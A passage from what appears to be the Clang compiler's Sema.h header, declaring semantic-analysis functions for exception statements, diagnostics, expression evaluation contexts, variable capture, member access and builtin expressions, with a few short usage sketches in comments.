LabelDecl *GetOrCreateMSAsmLabel(StringRef ExternalLabelName,
SourceLocation Location,
bool AlwaysCreate);
VarDecl *BuildObjCExceptionDecl(TypeSourceInfo *TInfo, QualType ExceptionType,
SourceLocation StartLoc,
SourceLocation IdLoc, IdentifierInfo *Id,
bool Invalid = false);
Decl *ActOnObjCExceptionDecl(Scope *S, Declarator &D);
StmtResult ActOnObjCAtCatchStmt(SourceLocation AtLoc, SourceLocation RParen,
Decl *Parm, Stmt *Body);
StmtResult ActOnObjCAtFinallyStmt(SourceLocation AtLoc, Stmt *Body);
StmtResult ActOnObjCAtTryStmt(SourceLocation AtLoc, Stmt *Try,
MultiStmtArg Catch, Stmt *Finally);
StmtResult BuildObjCAtThrowStmt(SourceLocation AtLoc, Expr *Throw);
StmtResult ActOnObjCAtThrowStmt(SourceLocation AtLoc, Expr *Throw,
Scope *CurScope);
ExprResult ActOnObjCAtSynchronizedOperand(SourceLocation atLoc,
Expr *operand);
StmtResult ActOnObjCAtSynchronizedStmt(SourceLocation AtLoc,
Expr *SynchExpr,
Stmt *SynchBody);
StmtResult ActOnObjCAutoreleasePoolStmt(SourceLocation AtLoc, Stmt *Body);
VarDecl *BuildExceptionDeclaration(Scope *S, TypeSourceInfo *TInfo,
SourceLocation StartLoc,
SourceLocation IdLoc,
IdentifierInfo *Id);
Decl *ActOnExceptionDeclarator(Scope *S, Declarator &D);
StmtResult ActOnCXXCatchBlock(SourceLocation CatchLoc,
Decl *ExDecl, Stmt *HandlerBlock);
StmtResult ActOnCXXTryBlock(SourceLocation TryLoc, Stmt *TryBlock,
ArrayRef<Stmt *> Handlers);
StmtResult ActOnSEHTryBlock(bool IsCXXTry, // try (true) or __try (false) ?
SourceLocation TryLoc, Stmt *TryBlock,
Stmt *Handler);
StmtResult ActOnSEHExceptBlock(SourceLocation Loc,
Expr *FilterExpr,
Stmt *Block);
void ActOnStartSEHFinallyBlock();
void ActOnAbortSEHFinallyBlock();
StmtResult ActOnFinishSEHFinallyBlock(SourceLocation Loc, Stmt *Block);
StmtResult ActOnSEHLeaveStmt(SourceLocation Loc, Scope *CurScope);
void DiagnoseReturnInConstructorExceptionHandler(CXXTryStmt *TryBlock);
bool ShouldWarnIfUnusedFileScopedDecl(const DeclaratorDecl *D) const;
/// If it's a file scoped decl that must warn if not used, keep track
/// of it.
void MarkUnusedFileScopedDecl(const DeclaratorDecl *D);
/// DiagnoseUnusedExprResult - If the statement passed in is an expression
/// whose result is unused, warn.
void DiagnoseUnusedExprResult(const Stmt *S);
void DiagnoseUnusedNestedTypedefs(const RecordDecl *D);
void DiagnoseUnusedDecl(const NamedDecl *ND);
/// Emit \p DiagID if statement located on \p StmtLoc has a suspicious null
/// statement as a \p Body, and it is located on the same line.
///
/// This helps prevent bugs due to typos, such as:
/// if (condition);
/// do_stuff();
void DiagnoseEmptyStmtBody(SourceLocation StmtLoc,
const Stmt *Body,
unsigned DiagID);
/// Warn if a for/while loop statement \p S, which is followed by
/// \p PossibleBody, has a suspicious null statement as a body.
void DiagnoseEmptyLoopBody(const Stmt *S,
const Stmt *PossibleBody);
/// Warn if a value is moved to itself.
void DiagnoseSelfMove(const Expr *LHSExpr, const Expr *RHSExpr,
SourceLocation OpLoc);
/// Warn if we're implicitly casting from a _Nullable pointer type to a
/// _Nonnull one.
void diagnoseNullableToNonnullConversion(QualType DstType, QualType SrcType,
SourceLocation Loc);
/// Warn when implicitly casting 0 to nullptr.
void diagnoseZeroToNullptrConversion(CastKind Kind, const Expr *E);
ParsingDeclState PushParsingDeclaration(sema::DelayedDiagnosticPool &pool) {
return DelayedDiagnostics.push(pool);
}
void PopParsingDeclaration(ParsingDeclState state, Decl *decl);
typedef ProcessingContextState ParsingClassState;
ParsingClassState PushParsingClass() {
ParsingClassDepth++;
return DelayedDiagnostics.pushUndelayed();
}
void PopParsingClass(ParsingClassState state) {
ParsingClassDepth--;
DelayedDiagnostics.popUndelayed(state);
}
void redelayDiagnostics(sema::DelayedDiagnosticPool &pool);
void DiagnoseAvailabilityOfDecl(NamedDecl *D, ArrayRef<SourceLocation> Locs,
const ObjCInterfaceDecl *UnknownObjCClass,
bool ObjCPropertyAccess,
bool AvoidPartialAvailabilityChecks = false,
ObjCInterfaceDecl *ClassReceiver = nullptr);
bool makeUnavailableInSystemHeader(SourceLocation loc,
UnavailableAttr::ImplicitReason reason);
/// Issue any -Wunguarded-availability warnings in \c FD
void DiagnoseUnguardedAvailabilityViolations(Decl *FD);
void handleDelayedAvailabilityCheck(sema::DelayedDiagnostic &DD, Decl *Ctx);
//===--------------------------------------------------------------------===//
// Expression Parsing Callbacks: SemaExpr.cpp.
bool CanUseDecl(NamedDecl *D, bool TreatUnavailableAsInvalid);
bool DiagnoseUseOfDecl(NamedDecl *D, ArrayRef<SourceLocation> Locs,
const ObjCInterfaceDecl *UnknownObjCClass = nullptr,
bool ObjCPropertyAccess = false,
bool AvoidPartialAvailabilityChecks = false,
ObjCInterfaceDecl *ClassReceiver = nullptr);
void NoteDeletedFunction(FunctionDecl *FD);
void NoteDeletedInheritingConstructor(CXXConstructorDecl *CD);
bool DiagnosePropertyAccessorMismatch(ObjCPropertyDecl *PD,
ObjCMethodDecl *Getter,
SourceLocation Loc);
void DiagnoseSentinelCalls(NamedDecl *D, SourceLocation Loc,
ArrayRef<Expr *> Args);
void PushExpressionEvaluationContext(
ExpressionEvaluationContext NewContext, Decl *LambdaContextDecl = nullptr,
ExpressionEvaluationContextRecord::ExpressionKind Type =
ExpressionEvaluationContextRecord::EK_Other);
enum ReuseLambdaContextDecl_t { ReuseLambdaContextDecl };
void PushExpressionEvaluationContext(
ExpressionEvaluationContext NewContext, ReuseLambdaContextDecl_t,
ExpressionEvaluationContextRecord::ExpressionKind Type =
ExpressionEvaluationContextRecord::EK_Other);
void PopExpressionEvaluationContext();
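/// A minimal usage sketch, assuming an in-scope Sema &S and the
/// ExpressionEvaluationContext enumeration declared earlier in this class:
/// enter an unevaluated context (e.g. for a sizeof operand), then restore
/// the previous one.
/// \code
///   S.PushExpressionEvaluationContext(
///       Sema::ExpressionEvaluationContext::Unevaluated);
///   // ... build the unevaluated operand ...
///   S.PopExpressionEvaluationContext();
/// \endcode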
void DiscardCleanupsInEvaluationContext();
ExprResult TransformToPotentiallyEvaluated(Expr *E);
ExprResult HandleExprEvaluationContextForTypeof(Expr *E);
ExprResult CheckUnevaluatedOperand(Expr *E);
void CheckUnusedVolatileAssignment(Expr *E);
ExprResult ActOnConstantExpression(ExprResult Res);
// Functions for marking a declaration referenced. These functions also
// contain the relevant logic for marking if a reference to a function or
// variable is an odr-use (in the C++11 sense). There are separate variants
// for expressions referring to a decl; these exist because odr-use marking
// needs to be delayed for some constant variables when we build one of the
// named expressions.
//
// MightBeOdrUse indicates whether the use could possibly be an odr-use, and
// should usually be true. This only needs to be set to false if the lack of
// odr-use cannot be determined from the current context (for instance,
// because the name denotes a virtual function and was written without an
// explicit nested-name-specifier).
void MarkAnyDeclReferenced(SourceLocation Loc, Decl *D, bool MightBeOdrUse);
void MarkFunctionReferenced(SourceLocation Loc, FunctionDecl *Func,
bool MightBeOdrUse = true);
void MarkVariableReferenced(SourceLocation Loc, VarDecl *Var);
void MarkDeclRefReferenced(DeclRefExpr *E, const Expr *Base = nullptr);
void MarkMemberReferenced(MemberExpr *E);
void MarkFunctionParmPackReferenced(FunctionParmPackExpr *E);
void MarkCaptureUsedInEnclosingContext(VarDecl *Capture, SourceLocation Loc,
unsigned CapturingScopeIndex);
ExprResult CheckLValueToRValueConversionOperand(Expr *E);
void CleanupVarDeclMarking();
enum TryCaptureKind {
TryCapture_Implicit, TryCapture_ExplicitByVal, TryCapture_ExplicitByRef
};
/// Try to capture the given variable.
///
/// \param Var The variable to capture.
///
/// \param Loc The location at which the capture occurs.
///
/// \param Kind The kind of capture, which may be implicit (for either a
/// block or a lambda), or explicit by-value or by-reference (for a lambda).
///
/// \param EllipsisLoc The location of the ellipsis, if one is provided in
/// an explicit lambda capture.
///
/// \param BuildAndDiagnose Whether we are actually supposed to add the
/// captures or diagnose errors. If false, this routine merely checks whether
/// the capture can occur, without performing the capture itself or
/// complaining if the variable cannot be captured.
///
/// \param CaptureType Will be set to the type of the field used to capture
/// this variable in the innermost block or lambda. Only valid when the
/// variable can be captured.
///
/// \param DeclRefType Will be set to the type of a reference to the capture
/// from within the current scope. Only valid when the variable can be
/// captured.
///
/// \param FunctionScopeIndexToStopAt If non-null, it points to the index
/// of the FunctionScopeInfo stack beyond which we do not attempt to capture.
/// This is useful when enclosing lambdas must speculatively capture
/// variables that may or may not be used in certain specializations of
/// a nested generic lambda.
///
/// \returns true if an error occurred (i.e., the variable cannot be
/// captured) and false if the capture succeeded.
bool tryCaptureVariable(VarDecl *Var, SourceLocation Loc, TryCaptureKind Kind,
SourceLocation EllipsisLoc, bool BuildAndDiagnose,
QualType &CaptureType,
QualType &DeclRefType,
const unsigned *const FunctionScopeIndexToStopAt);
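/// A minimal sketch of the BuildAndDiagnose=false mode described above,
/// assuming an in-scope Sema &S and a VarDecl *Var (hypothetical locals):
/// ask whether a capture would succeed without performing it.
/// \code
///   QualType CaptureType, DeclRefType;
///   bool Invalid = S.tryCaptureVariable(
///       Var, Loc, Sema::TryCapture_Implicit, SourceLocation(),
///       /*BuildAndDiagnose=*/false, CaptureType, DeclRefType,
///       /*FunctionScopeIndexToStopAt=*/nullptr);
/// \endcode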
/// Try to capture the given variable.
bool tryCaptureVariable(VarDecl *Var, SourceLocation Loc,
TryCaptureKind Kind = TryCapture_Implicit,
SourceLocation EllipsisLoc = SourceLocation());
/// Checks if the variable must be captured.
bool NeedToCaptureVariable(VarDecl *Var, SourceLocation Loc);
/// Given a variable, determine the type that a reference to that
/// variable will have in the given scope.
QualType getCapturedDeclRefType(VarDecl *Var, SourceLocation Loc);
/// Mark all of the declarations referenced within a particular AST node as
/// referenced. Used when template instantiation instantiates a non-dependent
/// type -- entities referenced by the type are now referenced.
void MarkDeclarationsReferencedInType(SourceLocation Loc, QualType T);
void MarkDeclarationsReferencedInExpr(Expr *E,
bool SkipLocalVariables = false);
/// Try to recover by turning the given expression into a
/// call. Returns true if recovery was attempted or an error was
/// emitted; this may also leave the ExprResult invalid.
bool tryToRecoverWithCall(ExprResult &E, const PartialDiagnostic &PD,
bool ForceComplain = false,
bool (*IsPlausibleResult)(QualType) = nullptr);
/// Figure out if an expression could be turned into a call.
bool tryExprAsCall(Expr &E, QualType &ZeroArgCallReturnTy,
UnresolvedSetImpl &NonTemplateOverloads);
/// Conditionally issue a diagnostic based on the current
/// evaluation context.
///
/// \param Statement If Statement is non-null, delay reporting the
/// diagnostic until the function body is parsed, and then do a basic
/// reachability analysis to determine if the statement is reachable.
/// If it is unreachable, the diagnostic will not be emitted.
bool DiagRuntimeBehavior(SourceLocation Loc, const Stmt *Statement,
const PartialDiagnostic &PD);
/// Similar, but the diagnostic is only produced if all the specified
/// statements are reachable.
bool DiagRuntimeBehavior(SourceLocation Loc, ArrayRef<const Stmt*> Stmts,
const PartialDiagnostic &PD);
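/// A minimal usage sketch (hypothetical diagnostic ID and locals): the
/// warning is delayed and then dropped if Call turns out to be unreachable.
/// \code
///   S.DiagRuntimeBehavior(Loc, Call,
///                         S.PDiag(diag::warn_null_arg) << ArgRange);
/// \endcode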
// Primary Expressions.
SourceRange getExprRange(Expr *E) const;
ExprResult ActOnIdExpression(
Scope *S, CXXScopeSpec &SS, SourceLocation TemplateKWLoc,
UnqualifiedId &Id, bool HasTrailingLParen, bool IsAddressOfOperand,
CorrectionCandidateCallback *CCC = nullptr,
bool IsInlineAsmIdentifier = false, Token *KeywordReplacement = nullptr);
void DecomposeUnqualifiedId(const UnqualifiedId &Id,
TemplateArgumentListInfo &Buffer,
DeclarationNameInfo &NameInfo,
const TemplateArgumentListInfo *&TemplateArgs);
bool
DiagnoseEmptyLookup(Scope *S, CXXScopeSpec &SS, LookupResult &R,
CorrectionCandidateCallback &CCC,
TemplateArgumentListInfo *ExplicitTemplateArgs = nullptr,
ArrayRef<Expr *> Args = None, TypoExpr **Out = nullptr);
DeclResult LookupIvarInObjCMethod(LookupResult &Lookup, Scope *S,
IdentifierInfo *II);
ExprResult BuildIvarRefExpr(Scope *S, SourceLocation Loc, ObjCIvarDecl *IV);
ExprResult LookupInObjCMethod(LookupResult &LookUp, Scope *S,
IdentifierInfo *II,
bool AllowBuiltinCreation=false);
ExprResult ActOnDependentIdExpression(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
const DeclarationNameInfo &NameInfo,
bool isAddressOfOperand,
const TemplateArgumentListInfo *TemplateArgs);
/// If \p D cannot be odr-used in the current expression evaluation context,
/// return a reason explaining why. Otherwise, return NOUR_None.
NonOdrUseReason getNonOdrUseReasonInCurrentContext(ValueDecl *D);
DeclRefExpr *BuildDeclRefExpr(ValueDecl *D, QualType Ty, ExprValueKind VK,
SourceLocation Loc,
const CXXScopeSpec *SS = nullptr);
DeclRefExpr *
BuildDeclRefExpr(ValueDecl *D, QualType Ty, ExprValueKind VK,
const DeclarationNameInfo &NameInfo,
const CXXScopeSpec *SS = nullptr,
NamedDecl *FoundD = nullptr,
SourceLocation TemplateKWLoc = SourceLocation(),
const TemplateArgumentListInfo *TemplateArgs = nullptr);
DeclRefExpr *
BuildDeclRefExpr(ValueDecl *D, QualType Ty, ExprValueKind VK,
const DeclarationNameInfo &NameInfo,
NestedNameSpecifierLoc NNS,
NamedDecl *FoundD = nullptr,
SourceLocation TemplateKWLoc = SourceLocation(),
const TemplateArgumentListInfo *TemplateArgs = nullptr);
ExprResult
BuildAnonymousStructUnionMemberReference(
const CXXScopeSpec &SS,
SourceLocation nameLoc,
IndirectFieldDecl *indirectField,
DeclAccessPair FoundDecl = DeclAccessPair::make(nullptr, AS_none),
Expr *baseObjectExpr = nullptr,
SourceLocation opLoc = SourceLocation());
ExprResult BuildPossibleImplicitMemberExpr(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
LookupResult &R,
const TemplateArgumentListInfo *TemplateArgs,
const Scope *S);
ExprResult BuildImplicitMemberExpr(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
LookupResult &R,
const TemplateArgumentListInfo *TemplateArgs,
bool IsDefiniteInstance,
const Scope *S);
bool UseArgumentDependentLookup(const CXXScopeSpec &SS,
const LookupResult &R,
bool HasTrailingLParen);
ExprResult
BuildQualifiedDeclarationNameExpr(CXXScopeSpec &SS,
const DeclarationNameInfo &NameInfo,
bool IsAddressOfOperand, const Scope *S,
TypeSourceInfo **RecoveryTSI = nullptr);
ExprResult BuildDependentDeclRefExpr(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
const DeclarationNameInfo &NameInfo,
const TemplateArgumentListInfo *TemplateArgs);
ExprResult BuildDeclarationNameExpr(const CXXScopeSpec &SS,
LookupResult &R,
bool NeedsADL,
bool AcceptInvalidDecl = false);
ExprResult BuildDeclarationNameExpr(
const CXXScopeSpec &SS, const DeclarationNameInfo &NameInfo, NamedDecl *D,
NamedDecl *FoundD = nullptr,
const TemplateArgumentListInfo *TemplateArgs = nullptr,
bool AcceptInvalidDecl = false);
ExprResult BuildLiteralOperatorCall(LookupResult &R,
DeclarationNameInfo &SuffixInfo,
ArrayRef<Expr *> Args,
SourceLocation LitEndLoc,
TemplateArgumentListInfo *ExplicitTemplateArgs = nullptr);
ExprResult BuildPredefinedExpr(SourceLocation Loc,
PredefinedExpr::IdentKind IK);
ExprResult ActOnPredefinedExpr(SourceLocation Loc, tok::TokenKind Kind);
ExprResult ActOnIntegerConstant(SourceLocation Loc, uint64_t Val);
ExprResult BuildUniqueStableName(SourceLocation Loc, TypeSourceInfo *Operand);
ExprResult BuildUniqueStableName(SourceLocation Loc, Expr *E);
ExprResult ActOnUniqueStableNameExpr(SourceLocation OpLoc,
SourceLocation LParen,
SourceLocation RParen, ParsedType Ty);
ExprResult ActOnUniqueStableNameExpr(SourceLocation OpLoc,
SourceLocation LParen,
SourceLocation RParen, Expr *E);
bool CheckLoopHintExpr(Expr *E, SourceLocation Loc);
ExprResult ActOnNumericConstant(const Token &Tok, Scope *UDLScope = nullptr);
ExprResult ActOnCharacterConstant(const Token &Tok,
Scope *UDLScope = nullptr);
ExprResult ActOnParenExpr(SourceLocation L, SourceLocation R, Expr *E);
ExprResult ActOnParenListExpr(SourceLocation L,
SourceLocation R,
MultiExprArg Val);
/// ActOnStringLiteral - The specified tokens were lexed as pasted string
/// fragments (e.g. "foo" "bar" L"baz").
ExprResult ActOnStringLiteral(ArrayRef<Token> StringToks,
Scope *UDLScope = nullptr);
ExprResult ActOnGenericSelectionExpr(SourceLocation KeyLoc,
SourceLocation DefaultLoc,
SourceLocation RParenLoc,
Expr *ControllingExpr,
ArrayRef<ParsedType> ArgTypes,
ArrayRef<Expr *> ArgExprs);
ExprResult CreateGenericSelectionExpr(SourceLocation KeyLoc,
SourceLocation DefaultLoc,
SourceLocation RParenLoc,
Expr *ControllingExpr,
ArrayRef<TypeSourceInfo *> Types,
ArrayRef<Expr *> Exprs);
// Binary/Unary Operators. 'Tok' is the token for the operator.
ExprResult CreateBuiltinUnaryOp(SourceLocation OpLoc, UnaryOperatorKind Opc,
Expr *InputExpr);
ExprResult BuildUnaryOp(Scope *S, SourceLocation OpLoc,
UnaryOperatorKind Opc, Expr *Input);
ExprResult ActOnUnaryOp(Scope *S, SourceLocation OpLoc,
tok::TokenKind Op, Expr *Input);
bool isQualifiedMemberAccess(Expr *E);
QualType CheckAddressOfOperand(ExprResult &Operand, SourceLocation OpLoc);
ExprResult CreateUnaryExprOrTypeTraitExpr(TypeSourceInfo *TInfo,
SourceLocation OpLoc,
UnaryExprOrTypeTrait ExprKind,
SourceRange R);
ExprResult CreateUnaryExprOrTypeTraitExpr(Expr *E, SourceLocation OpLoc,
UnaryExprOrTypeTrait ExprKind);
ExprResult
ActOnUnaryExprOrTypeTraitExpr(SourceLocation OpLoc,
UnaryExprOrTypeTrait ExprKind,
bool IsType, void *TyOrEx,
SourceRange ArgRange);
ExprResult CheckPlaceholderExpr(Expr *E);
bool CheckVecStepExpr(Expr *E);
bool CheckUnaryExprOrTypeTraitOperand(Expr *E, UnaryExprOrTypeTrait ExprKind);
bool CheckUnaryExprOrTypeTraitOperand(QualType ExprType, SourceLocation OpLoc,
SourceRange ExprRange,
UnaryExprOrTypeTrait ExprKind);
ExprResult ActOnSizeofParameterPackExpr(Scope *S,
SourceLocation OpLoc,
IdentifierInfo &Name,
SourceLocation NameLoc,
SourceLocation RParenLoc);
ExprResult ActOnPostfixUnaryOp(Scope *S, SourceLocation OpLoc,
tok::TokenKind Kind, Expr *Input);
ExprResult ActOnArraySubscriptExpr(Scope *S, Expr *Base, SourceLocation LLoc,
Expr *Idx, SourceLocation RLoc);
ExprResult CreateBuiltinArraySubscriptExpr(Expr *Base, SourceLocation LLoc,
Expr *Idx, SourceLocation RLoc);
ExprResult ActOnOMPArraySectionExpr(Expr *Base, SourceLocation LBLoc,
Expr *LowerBound, SourceLocation ColonLoc,
Expr *Length, SourceLocation RBLoc);
ExprResult ActOnOMPArrayShapingExpr(Expr *Base, SourceLocation LParenLoc,
SourceLocation RParenLoc,
ArrayRef<Expr *> Dims,
ArrayRef<SourceRange> Brackets);
/// Data structure for iterator expression.
struct OMPIteratorData {
IdentifierInfo *DeclIdent = nullptr;
SourceLocation DeclIdentLoc;
ParsedType Type;
OMPIteratorExpr::IteratorRange Range;
SourceLocation AssignLoc;
SourceLocation ColonLoc;
SourceLocation SecColonLoc;
};
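/// A minimal sketch, with hypothetical locals, of how the fields map onto
/// the OpenMP iterator modifier 'iterator(int it = begin:end)'.
/// \code
///   Sema::OMPIteratorData D;
///   D.DeclIdent = ItIdent;      // identifier 'it'
///   D.DeclIdentLoc = ItLoc;
///   D.Type = ParsedIntTy;       // the parsed 'int'
///   D.AssignLoc = EqLoc;        // '='
///   D.ColonLoc = FirstColonLoc; // ':' between begin and end
/// \endcode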
ExprResult ActOnOMPIteratorExpr(Scope *S, SourceLocation IteratorKwLoc,
SourceLocation LLoc, SourceLocation RLoc,
ArrayRef<OMPIteratorData> Data);
// This struct is for use by ActOnMemberAccess to allow
// BuildMemberReferenceExpr to reinvoke ActOnMemberAccess after changing
// the access operator from a '.' to a '->' (to see if that is the change
// needed to fix an error about an unknown member, e.g. when the class
// defines a custom operator->).
struct ActOnMemberAccessExtraArgs {
Scope *S;
UnqualifiedId &Id;
Decl *ObjCImpDecl;
};
ExprResult BuildMemberReferenceExpr(
Expr *Base, QualType BaseType, SourceLocation OpLoc, bool IsArrow,
CXXScopeSpec &SS, SourceLocation TemplateKWLoc,
NamedDecl *FirstQualifierInScope, const DeclarationNameInfo &NameInfo,
const TemplateArgumentListInfo *TemplateArgs,
const Scope *S,
ActOnMemberAccessExtraArgs *ExtraArgs = nullptr);
ExprResult
BuildMemberReferenceExpr(Expr *Base, QualType BaseType, SourceLocation OpLoc,
bool IsArrow, const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
NamedDecl *FirstQualifierInScope, LookupResult &R,
const TemplateArgumentListInfo *TemplateArgs,
const Scope *S,
bool SuppressQualifierCheck = false,
ActOnMemberAccessExtraArgs *ExtraArgs = nullptr);
ExprResult BuildFieldReferenceExpr(Expr *BaseExpr, bool IsArrow,
SourceLocation OpLoc,
const CXXScopeSpec &SS, FieldDecl *Field,
DeclAccessPair FoundDecl,
const DeclarationNameInfo &MemberNameInfo);
ExprResult PerformMemberExprBaseConversion(Expr *Base, bool IsArrow);
bool CheckQualifiedMemberReference(Expr *BaseExpr, QualType BaseType,
const CXXScopeSpec &SS,
const LookupResult &R);
ExprResult ActOnDependentMemberExpr(Expr *Base, QualType BaseType,
bool IsArrow, SourceLocation OpLoc,
const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
NamedDecl *FirstQualifierInScope,
const DeclarationNameInfo &NameInfo,
const TemplateArgumentListInfo *TemplateArgs);
ExprResult ActOnMemberAccessExpr(Scope *S, Expr *Base,
SourceLocation OpLoc,
tok::TokenKind OpKind,
CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
UnqualifiedId &Member,
Decl *ObjCImpDecl);
MemberExpr *
BuildMemberExpr(Expr *Base, bool IsArrow, SourceLocation OpLoc,
const CXXScopeSpec *SS, SourceLocation TemplateKWLoc,
ValueDecl *Member, DeclAccessPair FoundDecl,
bool HadMultipleCandidates,
const DeclarationNameInfo &MemberNameInfo, QualType Ty,
ExprValueKind VK, ExprObjectKind OK,
const TemplateArgumentListInfo *TemplateArgs = nullptr);
MemberExpr *
BuildMemberExpr(Expr *Base, bool IsArrow, SourceLocation OpLoc,
NestedNameSpecifierLoc NNS, SourceLocation TemplateKWLoc,
ValueDecl *Member, DeclAccessPair FoundDecl,
bool HadMultipleCandidates,
const DeclarationNameInfo &MemberNameInfo, QualType Ty,
ExprValueKind VK, ExprObjectKind OK,
const TemplateArgumentListInfo *TemplateArgs = nullptr);
void ActOnDefaultCtorInitializers(Decl *CDtorDecl);
bool ConvertArgumentsForCall(CallExpr *Call, Expr *Fn,
FunctionDecl *FDecl,
const FunctionProtoType *Proto,
ArrayRef<Expr *> Args,
SourceLocation RParenLoc,
bool ExecConfig = false);
void CheckStaticArrayArgument(SourceLocation CallLoc,
ParmVarDecl *Param,
const Expr *ArgExpr);
/// ActOnCallExpr - Handle a call to Fn with the specified array of arguments.
/// This provides the location of the left/right parens and a list of comma
/// locations.
ExprResult ActOnCallExpr(Scope *S, Expr *Fn, SourceLocation LParenLoc,
MultiExprArg ArgExprs, SourceLocation RParenLoc,
Expr *ExecConfig = nullptr);
ExprResult BuildCallExpr(Scope *S, Expr *Fn, SourceLocation LParenLoc,
MultiExprArg ArgExprs, SourceLocation RParenLoc,
Expr *ExecConfig = nullptr,
bool IsExecConfig = false);
enum class AtomicArgumentOrder { API, AST };
ExprResult
BuildAtomicExpr(SourceRange CallRange, SourceRange ExprRange,
SourceLocation RParenLoc, MultiExprArg Args,
AtomicExpr::AtomicOp Op,
AtomicArgumentOrder ArgOrder = AtomicArgumentOrder::API);
ExprResult
BuildResolvedCallExpr(Expr *Fn, NamedDecl *NDecl, SourceLocation LParenLoc,
ArrayRef<Expr *> Arg, SourceLocation RParenLoc,
Expr *Config = nullptr, bool IsExecConfig = false,
ADLCallKind UsesADL = ADLCallKind::NotADL);
ExprResult ActOnCUDAExecConfigExpr(Scope *S, SourceLocation LLLLoc,
MultiExprArg ExecConfig,
SourceLocation GGGLoc);
ExprResult ActOnCastExpr(Scope *S, SourceLocation LParenLoc,
Declarator &D, ParsedType &Ty,
SourceLocation RParenLoc, Expr *CastExpr);
ExprResult BuildCStyleCastExpr(SourceLocation LParenLoc,
TypeSourceInfo *Ty,
SourceLocation RParenLoc,
Expr *Op);
CastKind PrepareScalarCast(ExprResult &src, QualType destType);
/// Build an AltiVec or OpenCL vector literal.
ExprResult BuildVectorLiteral(SourceLocation LParenLoc,
SourceLocation RParenLoc, Expr *E,
TypeSourceInfo *TInfo);
ExprResult MaybeConvertParenListExprToParenExpr(Scope *S, Expr *ME);
ExprResult ActOnCompoundLiteral(SourceLocation LParenLoc,
ParsedType Ty,
SourceLocation RParenLoc,
Expr *InitExpr);
ExprResult BuildCompoundLiteralExpr(SourceLocation LParenLoc,
TypeSourceInfo *TInfo,
SourceLocation RParenLoc,
Expr *LiteralExpr);
ExprResult ActOnInitList(SourceLocation LBraceLoc,
MultiExprArg InitArgList,
SourceLocation RBraceLoc);
ExprResult BuildInitList(SourceLocation LBraceLoc,
MultiExprArg InitArgList,
SourceLocation RBraceLoc);
ExprResult ActOnDesignatedInitializer(Designation &Desig,
SourceLocation EqualOrColonLoc,
bool GNUSyntax,
ExprResult Init);
private:
static BinaryOperatorKind ConvertTokenKindToBinaryOpcode(tok::TokenKind Kind);
public:
ExprResult ActOnBinOp(Scope *S, SourceLocation TokLoc,
tok::TokenKind Kind, Expr *LHSExpr, Expr *RHSExpr);
ExprResult BuildBinOp(Scope *S, SourceLocation OpLoc,
BinaryOperatorKind Opc, Expr *LHSExpr, Expr *RHSExpr);
ExprResult CreateBuiltinBinOp(SourceLocation OpLoc, BinaryOperatorKind Opc,
Expr *LHSExpr, Expr *RHSExpr);
void DiagnoseCommaOperator(const Expr *LHS, SourceLocation Loc);
/// ActOnConditionalOp - Parse a ?: operation. Note that 'LHS' may be null
/// in the case of the GNU conditional expr extension.
ExprResult ActOnConditionalOp(SourceLocation QuestionLoc,
SourceLocation ColonLoc,
Expr *CondExpr, Expr *LHSExpr, Expr *RHSExpr);
/// ActOnAddrLabel - Parse the GNU address of label extension: "&&foo".
ExprResult ActOnAddrLabel(SourceLocation OpLoc, SourceLocation LabLoc,
LabelDecl *TheDecl);
void ActOnStartStmtExpr();
ExprResult ActOnStmtExpr(Scope *S, SourceLocation LPLoc, Stmt *SubStmt,
SourceLocation RPLoc);
ExprResult BuildStmtExpr(SourceLocation LPLoc, Stmt *SubStmt,
SourceLocation RPLoc, unsigned TemplateDepth);
// Handle the final expression in a statement expression.
ExprResult ActOnStmtExprResult(ExprResult E);
void ActOnStmtExprError();
// __builtin_offsetof(type, identifier(.identifier|[expr])*)
struct OffsetOfComponent {
SourceLocation LocStart, LocEnd;
bool isBrackets; // true if [expr], false if .ident
union {
IdentifierInfo *IdentInfo;
Expr *E;
} U;
};
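/// A minimal sketch, with hypothetical locals, of the components built for
/// __builtin_offsetof(S, a[4]) in source order.
/// \code
///   Sema::OffsetOfComponent A;   // '.a' (field designator)
///   A.isBrackets = false;
///   A.U.IdentInfo = IdentA;
///   Sema::OffsetOfComponent Idx; // '[4]' (array designator)
///   Idx.isBrackets = true;
///   Idx.U.E = FourExpr;
/// \endcode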
/// __builtin_offsetof(type, a.b[123][456].c)
ExprResult BuildBuiltinOffsetOf(SourceLocation BuiltinLoc,
TypeSourceInfo *TInfo,
ArrayRef<OffsetOfComponent> Components,
SourceLocation RParenLoc);
ExprResult ActOnBuiltinOffsetOf(Scope *S,
SourceLocation BuiltinLoc,
SourceLocation TypeLoc,
ParsedType ParsedArgTy,
ArrayRef<OffsetOfComponent> Components,
SourceLocation RParenLoc);
// __builtin_choose_expr(constExpr, expr1, expr2)
ExprResult ActOnChooseExpr(SourceLocation BuiltinLoc,
Expr *CondExpr, Expr *LHSExpr,
Expr *RHSExpr, SourceLocation RPLoc);
// __builtin_va_arg(expr, type)
ExprResult ActOnVAArg(SourceLocation BuiltinLoc, Expr *E, ParsedType Ty,
SourceLocation RPLoc);
ExprResult BuildVAArgExpr(SourceLocation BuiltinLoc, Expr *E,
TypeSourceInfo *TInfo, SourceLocation RPLoc);
// __builtin_LINE(), __builtin_FUNCTION(), __builtin_FILE(),
// __builtin_COLUMN()
ExprResult ActOnSourceLocExpr(SourceLocExpr::IdentKind Kind,
SourceLocation BuiltinLoc,
SourceLocation RPLoc);
// Build a potentially resolved SourceLocExpr.
ExprResult BuildSourceLocExpr(SourceLocExpr::IdentKind Kind,
SourceLocation BuiltinLoc, SourceLocation RPLoc,
DeclContext *ParentContext);
// __null
ExprResult ActOnGNUNullExpr(SourceLocation TokenLoc);
bool CheckCaseExpression(Expr *E);
/// Describes the result of an "if-exists" condition check.
enum IfExistsResult {
/// The symbol exists.
IER_Exists,
/// The symbol does not exist.
IER_DoesNotExist,
/// The name is a dependent name, so the results will differ
/// from one instantiation to the next.
IER_Dependent,
/// An error occurred.
IER_Error
};
IfExistsResult
CheckMicrosoftIfExistsSymbol(Scope *S, CXXScopeSpec &SS,
const DeclarationNameInfo &TargetNameInfo);
IfExistsResult
CheckMicrosoftIfExistsSymbol(Scope *S, SourceLocation KeywordLoc,
bool IsIfExists, CXXScopeSpec &SS,
